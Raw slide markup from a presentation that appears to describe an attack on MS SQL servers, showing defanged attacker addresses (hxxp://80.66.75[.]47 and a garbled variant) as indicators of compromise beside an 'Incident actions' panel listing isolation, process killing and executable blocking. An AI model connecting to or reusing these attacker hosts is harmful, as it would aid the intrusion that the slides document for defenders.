              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD3D4C5A-D0BB-08C8-D750-BA8E05CB4F3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4149455" y="3643407"/>
            <a:ext cx="3681418" cy="467642"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln cap="rnd">
            <a:noFill/>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="accent4">
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="D80B55"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1371600"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern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hxxp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern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://80.66.75[.]47</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="240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5" name="Rectangle: Rounded Corners 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E23401E-7F41-06AB-E9AA-2C98A6B547B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3703644" y="6977933"/>
            <a:ext cx="3529404" cy="467642"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln cap="rnd">
            <a:noFill/>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="accent4">
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="D80B55"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1371600"/>
            <a:r>
              <a:rPr lang="en-GB" sz="200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hXXp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="20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://80[.]66.75]]]].40</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="200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64C0DDF-7450-2002-F086-0C965F01A2BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="20356516" y="1103923"/>
            <a:ext cx="3689914" cy="4302895"/>
            <a:chOff x="5295013" y="1531088"/>
            <a:chExt cx="6528391" cy="7612912"/>
          </a:xfrm>
          <a:effectLst>
            <a:outerShdw blurRad="281331" dist="707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AD14C93-9794-92D3-27BD-ED908229F4A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5295013" y="1531088"/>
              <a:ext cx="6528391" cy="6444512"/>
              <a:chOff x="5295013" y="1531088"/>
              <a:chExt cx="6528391" cy="6444512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02F64631-1FCC-DC25-279D-8FE5B86CC265}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5295013" y="1531088"/>
                <a:ext cx="6528391" cy="6444512"/>
                <a:chOff x="5295013" y="1531088"/>
                <a:chExt cx="6528391" cy="6444512"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="42" name="Triangle 41">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58ECE120-F68A-F8D3-4D3D-FA5E5C71CCB1}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="10800000">
                  <a:off x="8322990" y="7676707"/>
                  <a:ext cx="491067" cy="298893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43" name="Rounded Rectangle 42">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6FB9BCB-80F1-01F6-A4A9-F96631C51ED3}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5295013" y="1531088"/>
                  <a:ext cx="6528391" cy="6145619"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst>
                    <a:gd name="adj" fmla="val 1096"/>
                  </a:avLst>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1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</p:grp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093CEEE-4622-471A-77E9-634A36DC8320}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5660289" y="1679946"/>
                <a:ext cx="3314628" cy="707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>
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr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Incident actions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3F97749-C015-AC82-89B5-6B7E20255726}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="2583703"/>
                <a:ext cx="3625238" cy="707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>
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr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Isolate computers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6800AEF-AEEA-3494-CC63-117A4B3A1DE4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="3458445"/>
                <a:ext cx="4604948" cy="707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>
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr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End computer isolation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5EBE540-FFBB-B8B9-5BFA-4EC1E6AB5B90}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="4674038"/>
                <a:ext cx="2789719" cy="707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Kill processes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D2057E5-FF8C-87E1-5AEC-A8B5A3DB43FC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="5858532"/>
                <a:ext cx="3416388" cy="707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Block executable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2142BCF-DE8A-8EC9-3021-D3A5A28A3868}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="6751666"/>
                <a:ext cx="3938233" cy="707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Unblock executable</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp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9484FCC5-28E5-1A7B-A555-65160E15D5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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5782139" y="2645078"/>
                <a:ext cx="523582" cy="523582"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="37" name="Graphic 36">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F7A1E94-77B1-3A3D-6EF2-A93FBC9791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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5763440" y="3501119"/>
                <a:ext cx="560981" cy="560981"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="38" name="Graphic 37">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08E1B367-7EF2-633D-8C68-99C3493861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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5763440" y="4716713"/>
                <a:ext cx="560981" cy="560981"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="39" name="Graphic 38">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C9306E3-14AE-6CF5-F29F-78CD87F741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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5782139" y="5919906"/>
                <a:ext cx="523582" cy="523582"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic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5FD25199-8B23-26BD-93D9-CACEBC21D0A7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5760212" y="4420881"/>
                <a:ext cx="5616625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55665E54-2E92-E140-0AC3-EDD795108AA4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5760212" y="5547932"/>
                <a:ext cx="5616625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64D0B0C5-394C-D4CB-A495-3F0DDE0E59C8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5660289" y="7975601"/>
              <a:ext cx="5716548" cy="1168399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720000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="1800">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>INCIDENT ACTIONS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Triangle 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAF6FD4F-DF58-1D8F-A872-A3B8A624BEEC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="10594664" y="8465598"/>
              <a:ext cx="426260" cy="210887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720000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="sk-SK" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:endParaRP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F6CD9A06-CDE2-B1C6-DF94-AE0DB4139430}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5660289" y="2457634"/>
              <a:ext cx="5716546" cy="940360"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="10272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720000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="63" name="Group 156">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A198153B-E046-2E0C-155E-875A4026021A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3397195" y="388621"/>
            <a:ext cx="1205793" cy="1205793"/>
            <a:chOff x="9228675" y="2933048"/>
            <a:chExt cx="4118889" cy="4118889"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="64" name="Group 157">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50806D0E-6F5F-8BE6-01D7-1233E88D8AC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9228675" y="2933048"/>
              <a:ext cx="4118889" cy="4118889"/>
              <a:chOff x="7931149" y="2626295"/>
              <a:chExt cx="4118889" cy="4118889"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="66" name="Group 159">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{825C668A-81CB-463F-A357-228AE18F2A66}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="11339954" y="3278140"/>
                <a:ext cx="522194" cy="527315"/>
                <a:chOff x="3190875" y="974570"/>
                <a:chExt cx="249325" cy="251770"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="68" name="Rectangle 161">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A683408-4A22-AF01-DB95-1771C30360D6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3190875" y="974570"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="69" name="Rectangle 162">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD02AB51-D9A7-9D35-1B0A-F17501941121}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3327968" y="974570"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="70" name="Rectangle 163">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E2CE5D8-F002-535C-E08B-03B0ABF9A7E0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3190875" y="1113316"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="71" name="Rectangle 164">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{660EB8AC-5E6F-1A68-30D3-1C26B5414452}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3327968" y="1113316"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="67" name="Graphic 160">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{403DCE12-6EC6-5323-7A1D-B911703FFF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96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                    <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" xmlns="" r:embed="rId23"/>
                  </a:ext>
                </a:extLst>
              </a:blip>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7931149" y="2626295"/>
                <a:ext cx="4118889" cy="4118889"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65" name="Oval 158">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DD5AFDD-7C68-20A5-4F7B-0EB5F18A1FA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10515933" y="4127841"/>
              <a:ext cx="1578270" cy="46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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D353D653-61A0-B693-BB4F-C4CB001ADC6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187611" y="738481"/>
            <a:ext cx="5358657" cy="838155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="187631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923"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> SQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4754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132745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E229F-E814-23FF-3537-817389FC0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Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80907DC9-5307-E84B-EAD2-7EF67134E5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144721" y="-5037820"/>
            <a:ext cx="30087414" cy="18514850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{912E16A9-2748-DCE0-40DA-D9F56AD23E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849229" y="1284780"/>
            <a:ext cx="30560502" cy="18285230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="!!Gradient TEAL 2" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99BF074C-1A4E-4CFF-C902-B13ACF5C0BB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220222" y="-16963399"/>
            <a:ext cx="42906647" cy="26403406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12BBE4E6-17E4-8FDD-9EE3-4B468EFAFAA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14407705" y="-5577283"/>
            <a:ext cx="13607400" cy="8690365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F36720E1-BA41-E997-86AF-BEAE1774E36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-12354021" y="5703318"/>
            <a:ext cx="19335716" cy="1373068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E2CFDA9-4A37-0BDF-2DD4-FE8B616B6C76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030465" y="2611546"/>
            <a:ext cx="14803063" cy="386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dirty="0">
              <a:latin typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0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56D68B1-F7FB-7046-1132-D900011A1E83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13341497" y="4613070"/>
            <a:ext cx="3689914" cy="4302895"/>
            <a:chOff x="5295013" y="1531088"/>
            <a:chExt cx="6528391" cy="7612912"/>
          </a:xfrm>
          <a:effectLst>
            <a:outerShdw blurRad="281331" dist="707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B441E176-28D5-CA13-BD0A-207CAB5FB238}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5295013" y="1531088"/>
              <a:ext cx="6528391" cy="6444512"/>
              <a:chOff x="5295013" y="1531088"/>
              <a:chExt cx="6528391" cy="6444512"/>
            </a:xfrm>
          </p:grpSpPr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DE91EB2A-9001-7818-8936-5AA9F414DD8F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5295013" y="1531088"/>
                <a:ext cx="6528391" cy="6444512"/>
                <a:chOff x="5295013" y="1531088"/>
                <a:chExt cx="6528391" cy="6444512"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="86" name="Triangle 85">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B66C62B-0D51-CDCE-27E4-913B6D3A1879}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="10800000">
                  <a:off x="8322990" y="7676707"/>
                  <a:ext cx="491067" cy="298893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87" name="Rounded Rectangle 86">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A72D1AEE-7397-422B-55A5-1B07143BC478}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5295013" y="1531088"/>
                  <a:ext cx="6528391" cy="6145619"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst>
                    <a:gd name="adj" fmla="val 1096"/>
                  </a:avLst>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1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</p:grp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F2042DC9-6CB7-35EC-D542-017C94EF3ED2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5660289" y="1679946"/>
                <a:ext cx="3314628" cy="707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>
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr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Incident actions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8825204A-BBEB-12D7-16DD-68A252FDA564}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="2583703"/>
                <a:ext cx="3625238" cy="707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>
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr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Isolate computers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792075CB-BE2A-7D73-C635-74DE20BEC4EA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="3458445"/>
                <a:ext cx="4604948" cy="707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dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr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End computer isolation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7AC558E4-384C-F988-7B39-2EC3752E4FDA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="4674038"/>
